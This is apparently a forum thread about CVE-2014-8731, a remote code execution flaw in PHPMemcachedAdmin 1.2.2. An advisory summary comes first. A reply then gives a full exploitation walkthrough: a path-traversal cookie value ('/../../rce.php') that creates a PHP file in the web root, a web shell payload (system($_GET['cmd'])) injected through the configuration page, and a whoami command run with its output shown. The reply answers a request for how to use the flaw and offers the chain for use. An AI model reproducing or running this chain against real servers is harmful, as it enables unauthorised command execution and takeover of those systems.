Active Members akkiliON Posted November 13, 2014 Active Members Report Posted November 13, 2014 CVE-2014-8731CVSSv2 Vector: [AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C]CVSSv2 Base Score=10.0CVSSv2 Temp Score=9.5OWASP Top 10 classification: A1 - InjectionPHPMemcachedAdmin is a web-based frontend for Linux's memcached Daemon.Project Homepage: https://code.google.com/p/phpmemcacheadmin/ Download Site:http://blog.elijaa.org/index.php?pages/phpMemcachedAdmin-DownloadPHPMemcachedAdmin stores data in the server's filesystem. Part of the serialized data and the last part of the concatenated filename may be specified by the user, which can lead to remote code execution e.g. if a php script is created and placed within the webserver's document root.All versions prior and including the current version 1.2.2 are affected as far as we know.Surs?: PHPMemcachedAdmin 1.2.2 Remote Code Execution ? Packet Storm Quote
SirGod Posted November 13, 2014 Report Posted November 13, 2014 How can i use it?It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves:Let's take a look at stats.php:if(!isset($_COOKIE['live_stats_id' . $hash])){...}else{ # Backup from a previous request $live_stats_id = $_COOKIE['live_stats_id' . $hash];}If the 'live_stats_id' . $hash cookie is not set, it is created (with values that we can change). Take a look here:$hash is:$hash = md5($_GET['cluster']);and cluster is a variable that we can simply set via a GET request:if(isset($_GET['cluster']) && ($_GET['cluster'] != null)){ $cluster = $_GET['cluster'];}So, if we set the $cluster variable to test, the cookie name should become:live_stats_id098f6bcd4621d373cade4e832627b4f6The we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable:$file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id;The $file_path variable will become:Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6We can change the cookie value to "/../../rce.php", so $file_path will become:Temp/live_stats./../../rce.phpThen we can see that a file called rce.php has been created in the root directory.Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want):<?php system($_GET['cmd']);?>Then save the configuration. Now all you have to execute your command (example):http://127.0.0.1/rce.php?cmd=whoamiAnd you'll get:a:1:{s:33:"[COLOR=#ff0000][B]www-data[/B][/COLOR] :123";a:1:{s:10:"query_time";i:1;}}Have fun, I hope you learned something. 1 Quote
